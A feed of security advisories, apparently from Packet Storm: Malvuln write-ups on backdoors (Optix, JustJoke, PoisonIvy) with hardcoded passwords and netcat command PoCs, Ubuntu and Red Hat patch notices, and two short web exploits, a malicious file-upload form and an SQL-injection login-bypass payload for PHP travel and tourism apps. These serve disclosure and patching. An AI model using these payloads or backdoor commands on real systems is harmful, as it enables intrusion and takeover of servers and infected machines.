Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Ubuntu Security Notice 6986-1 - David Benjamin discovered that OpenSSL incorrectly handled certain X.509 certificates. An attacker could possible use this issue to cause a denial of service or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6986-1  
September 03, 2024

openssl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS

Summary:

OpenSSL could be made to crash or expose sensitive information  
if it received a specially crafted certificate.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

David Benjamin discovered that OpenSSL incorrectly handled certain  
X.509 certificates. An attacker could possible use this issue to  
cause a denial of service or expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libssl3t64                      3.0.13-0ubuntu3.4  
  openssl                         3.0.13-0ubuntu3.4

Ubuntu 22.04 LTS  
  libssl3                         3.0.2-0ubuntu1.18  
  openssl                         3.0.2-0ubuntu1.18

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6986-1  
  CVE-2024-6119

Package Information:  
  https://launchpad.net/ubuntu/+source/openssl/3.0.13-0ubuntu3.4  
  https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.18

Ubuntu Security Notice USN-6986-1

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

Ubuntu Security Notice 6981-2 - USN-6981-1 fixed vulnerabilities in Drupal. This update provides the corresponding updates for Ubuntu 14.04 LTS. It was discovered that Drupal incorrectly sanitized uploaded filenames. A remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6981-2September 03, 2024drupal7 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Drupal could be made to crash or run programs if it receivedspecially crafted network traffic.Software Description:- drupal7: fully-featured content management frameworkDetails:USN-6981-1 fixed vulnerabilities in Drupal. This update provides thecorresponding updates for Ubuntu 14.04 LTS.Original advisory details:  It was discovered that Drupal incorrectly sanitized uploaded filenames. A  remote attacker could possibly use this issue to execute arbitrary code.  (CVE-2020-13671)  It was discovered that Drupal incorrectly sanitized archived filenames. A  remote attacker could possibly use this issue to overwrite arbitrary  files, or execute arbitrary code. (CVE-2020-28948, CVE-2020-28949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   drupal7                         7.26-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6981-2   https://ubuntu.com/security/notices/USN-6981-1   CVE-2020-13671, CVE-2020-28948, CVE-2020-28949

Ubuntu Security Notice USN-6981-2

Ubuntu Security Notice 6987-1 - It was discovered that Django incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service. It was discovered that Django incorrectly handled certain email sending failures. A remote attacker could possibly use this issue to enumerate user emails by issuing password reset requests and observing the outcomes.

==========================================================================  
Ubuntu Security Notice USN-6987-1  
September 03, 2024

python-django vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Django.

Software Description:  
- python-django: High-level Python web development framework

Details:

It was discovered that Django incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2024-45230)

It was discovered that Django incorrectly handled certain email sending  
failures. A remote attacker could possibly use this issue to enumerate  
user emails by issuing password reset requests and observing the outcomes.  
(CVE-2024-45231)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-django                  3:4.2.11-1ubuntu1.3

Ubuntu 22.04 LTS  
  python3-django                  2:3.2.12-2ubuntu1.14

Ubuntu 20.04 LTS  
  python3-django                  2:2.2.12-1ubuntu0.25

Ubuntu 18.04 LTS  
  python-django                   1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro  
  python3-django                  1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6987-1  
  CVE-2024-45230, CVE-2024-45231

Package Information:  
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.3  
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.14  
  https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.25

Ubuntu Security Notice USN-6987-1

Online Travel Agency System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Travel Agency System 1.0 Shell Upload

Red Hat Security Advisory 2024-6297-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6297.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:6297-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6297  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2021-47138  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: cxgb4: avoid accessing registers when clearing filters (CVE-2021-47138)

* kernel: hv_netvsc: Fix race condition between netvsc_probe and netvsc_remove (CVE-2024-26698)

* kernel: mm/slub: fix to return errno if kmalloc() fails (CVE-2022-48659)

* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)

* kernel: vt: fix unicode buffer corruption when deleting characters (CVE-2024-35823)

* kernel: nvme-rdma: destroy cm id before destroy qp to avoid use after free (CVE-2021-47378)

* kernel: userfaultfd: fix a race between writeprotect and exit_mmap() (CVE-2021-47461)

* kernel: r8169: Fix possible ring buffer corruption on fragmented Tx packets. (CVE-2024-38586)

* kernel: bpf: Add BPF_PROG_TYPE_CGROUP_SKB attach type enforcement in BPF_LINK_CREATE (CVE-2024-38564)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: iommu: Fix potential use-after-free during probe (CVE-2022-48796)

* kernel: xfs: add bounds checking to xlog_recover_process_data (CVE-2024-41014)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47138

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2271484  
https://bugzilla.redhat.com/show_bug.cgi?id=2273117  
https://bugzilla.redhat.com/show_bug.cgi?id=2277801  
https://bugzilla.redhat.com/show_bug.cgi?id=2278337  
https://bugzilla.redhat.com/show_bug.cgi?id=2281190  
https://bugzilla.redhat.com/show_bug.cgi?id=2282362  
https://bugzilla.redhat.com/show_bug.cgi?id=2282896  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293429  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2298132  
https://bugzilla.redhat.com/show_bug.cgi?id=2300297

Red Hat Security Advisory 2024-6297-03

Red Hat Security Advisory 2024-6274-03 - Red Hat OpenShift distributed tracing 3.3.0.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6274.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenShift distributed tracing 3.3.0 operator/operand containersAdvisory ID:        RHSA-2024:6274-03Product:            Red Hat OpenShift distributed tracingAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6274Issue date:         2024-09-04Revision:           03CVE Names:          ====================================================================Summary: Red Hat OpenShift distributed tracing 3.3.0Description:Release of Red Hat OpenShift distributed tracing provides these changes:Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/TRACING-3768https://issues.redhat.com/browse/TRACING-3954https://issues.redhat.com/browse/TRACING-3984https://issues.redhat.com/browse/TRACING-4176https://issues.redhat.com/browse/TRACING-4177https://issues.redhat.com/browse/TRACING-4179https://issues.redhat.com/browse/TRACING-4185https://issues.redhat.com/browse/TRACING-4186https://issues.redhat.com/browse/TRACING-4187https://issues.redhat.com/browse/TRACING-4188https://issues.redhat.com/browse/TRACING-4201https://issues.redhat.com/browse/TRACING-4214https://issues.redhat.com/browse/TRACING-4288https://issues.redhat.com/browse/TRACING-4303https://issues.redhat.com/browse/TRACING-4348https://issues.redhat.com/browse/TRACING-4486https://issues.redhat.com/browse/TRACING-4497https://issues.redhat.com/browse/TRACING-4527

Red Hat Security Advisory 2024-6274-03

Tourism Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 Auth BY Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://localhost/tourism/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Source

Packet Storm